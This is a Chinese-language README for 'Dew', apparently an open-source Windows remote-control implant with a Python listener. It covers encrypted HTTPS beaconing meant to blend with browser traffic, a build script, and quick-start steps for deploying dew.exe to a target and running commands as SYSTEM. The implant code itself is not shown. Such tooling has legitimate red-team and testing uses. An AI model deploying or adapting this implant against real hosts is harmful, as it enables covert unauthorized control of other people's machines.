Real-Fruit-Snacks/Dew

## 功能特性 ### XChaCha20-Poly1305 使用嵌入式 Monocypher 提取的 AEAD 加密（约 370 行）。通过 `RtlGenRandom` 生成 24 字节随机 nonce。Wire 格式：`[nonce(24)][mac(16)][ciphertext]`。每条消息使用新的 nonce。 ### HTTPS 传输 原生 WinHTTP + TLS，端口 443。支持系统代理。Chrome User-Agent。标准 HTTPS，融入正常浏览流量。 ### 小型二进制文件（约 37 KB） 使用 `-Os -s` 剥离和大小优化。除原生 Windows DLL 外无运行时依赖。使用 MinGW-w64 从 Linux 交叉编译。 ### 零依赖 WinHTTP 和 advapi32 是原生 Windows 库。Monocypher 已嵌入并编译。目标主机无需安装任何内容。 ### 交互式监听器 带交互提示的 Python 3 HTTPS 服务器。自动生成自签名 TLS 证书。使用 PyNaCl 进行匹配的 XChaCha20-Poly1305 解/加密。线程安全命令队列。 ## 快速开始 ``` # 克隆并构建（生成随机 PSK，编译，打印监听器命令） git clone https://github.com/Real-Fruit-Snacks/Dew.git cd Dew ./build.sh 10.10.14.1 443 # 或指定您自己的 256 位密钥 ./build.sh 10.10.14.1 443 <64-char-hex> ``` ``` # 启动监听器（build.sh 使用您的密钥打印此命令） python3 listener.py --lport 443 --key # 部署 dew.exe 到目标，然后交互 dew> whoami nt authority\system ``` ## 架构 ``` [Target] [Operator] dew.exe ──── HTTPS/TLS ────> listener.py <── encrypted cmd ─── ── encrypted output ─> ``` | 层级 | 实现方式 | |-------|----------------| | **传输层** | WinHTTP + 原生 TLS，支持系统代理 | | **加密层** | XChaCha20-Poly1305 (Monocypher)，预共享密钥 | | **Wire 格式** | `[nonce(24)][mac(16)][ciphertext]`，每条消息使用新的 nonce | | **信标** | 通过 `POST /poll` 加密签到，使用 `RtlGenRandom` 添加抖动 | ## 配置 | 变量 | 默认值 | 描述 | |----------|---------|-------------| | `LHOST` | `127.0.0.1` | 监听器 IP/域名 | | `LPORT` | `443` | 监听器端口 | | `KEY` | 随机 256 位 | 预共享密钥（64 个十六进制字符） | | `SLEEP_BASE` | `5` | 轮询间隔（秒） | | `JITTER_PCT` | `30` | 抖动百分比（居中） | ## 安全 请通过 [GitHub 安全公告](https://github.com/Real-Fruit-Snacks/Dew/security/advisories) 报告漏洞。请勿为安全漏洞开启公开问题。 **Dew 不会：** 规避内核级监控（ETW）、绕过 AMSI、提供持久化、通过命令通道外传数据、或隐藏 WinHTTP 连接以躲避进程监控。 ## 许可证 [MIT](LICENSE) -- Copyright 2026 Real-Fruit-Snacks

标签：AEAD加密, HTTPS, IP 地址批量处理, MinGW-w64, PE 加载器, PyNaCl, Python, TLS加密, WinHTTP, XChaCha20-Poly1305, 加密通信, 反向shell, 后门, 客户端加密, 小型化, 恶意软件, 无后门, 网络信息收集, 远控工具, 隐蔽通信, 零依赖